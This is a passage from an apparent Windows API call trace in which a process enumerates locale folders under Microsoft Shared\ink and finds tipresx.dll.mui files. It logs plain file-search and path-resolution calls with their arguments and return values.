ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0044.202] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.202] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe846a08f, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe86330eb, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe8659248, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0044.202] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0044.202] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0044.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0044.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0044.202] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui", lpFilePart=0x0) returned 0x48 [0044.202] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0044.202] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA", lpFilePart=0x0) returned 0x38 [0044.202] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\", lpFilePart=0x0) returned 0x39 [0044.203] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0044.203] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.203] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe846a08f, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe86330eb, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe8659248, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0044.203] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe846a08f, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe86330eb, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe8659248, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0044.203] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0044.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0044.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0044.203] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG", lpFilePart=0x0) returned 0x38 [0044.203] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0044.203] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0044.203] CoTaskMemFree (pv=0x4fe370) [0044.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0044.204] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG", lpFilePart=0x0) returned 0x38 [0044.204] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0044.204] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG", lpFilePart=0x0) returned 0x38 [0044.204] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\", lpFilePart=0x0) returned 0x39 [0044.204] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0044.204] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.205] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea1207ac, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xea335ac2, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xea35bc1f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0044.205] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0044.205] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0044.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0044.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0044.205] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui", lpFilePart=0x0) returned 0x48 [0044.205] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0044.205] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG", lpFilePart=0x0) returned 0x38 [0044.205] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\", lpFilePart=0x0) returned 0x39 [0044.205] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0044.205] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.206] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea1207ac, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xea335ac2, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xea35bc1f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0044.206] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea1207ac, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xea335ac2, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xea35bc1f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0044.206] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0044.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0044.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0044.206] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ", lpFilePart=0x0) returned 0x38 [0044.206] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0044.206] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0044.206] CoTaskMemFree (pv=0x4fe370) [0044.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0044.206] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ", lpFilePart=0x0) returned 0x38 [0044.206] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0044.206] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ", lpFilePart=0x0) returned 0x38 [0044.206] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\", lpFilePart=0x0) returned 0x39 [0044.207] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0044.207] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.207] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6ce8929, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe6f23d9c, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe6f23d9c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0044.207] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0044.207] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0044.207] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0044.207] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0044.207] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui", lpFilePart=0x0) returned 0x48 [0044.208] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0044.208] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ", lpFilePart=0x0) returned 0x38 [0044.208] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\", lpFilePart=0x0) returned 0x39 [0044.208] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0044.208] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.208] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6ce8929, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe6f23d9c, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe6f23d9c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0044.208] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6ce8929, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe6f23d9c, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe6f23d9c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0044.208] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0044.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0044.209] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0044.209] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK", lpFilePart=0x0) returned 0x38 [0044.209] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0044.209] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0044.209] CoTaskMemFree (pv=0x4fe370) [0044.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0044.209] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK", lpFilePart=0x0) returned 0x38 [0044.209] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0044.209] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK", lpFilePart=0x0) returned 0x38 [0044.209] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\", lpFilePart=0x0) returned 0x39 [0044.209] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0044.210] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.210] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6fbc310, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe71ab4c9, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe71d1626, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0044.210] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0044.210] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0044.210] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0044.210] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0044.210] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui", lpFilePart=0x0) returned 0x48 [0044.210] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0044.210] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK", lpFilePart=0x0) returned 0x38 [0044.210] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\", lpFilePart=0x0) returned 0x39 [0044.210] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, 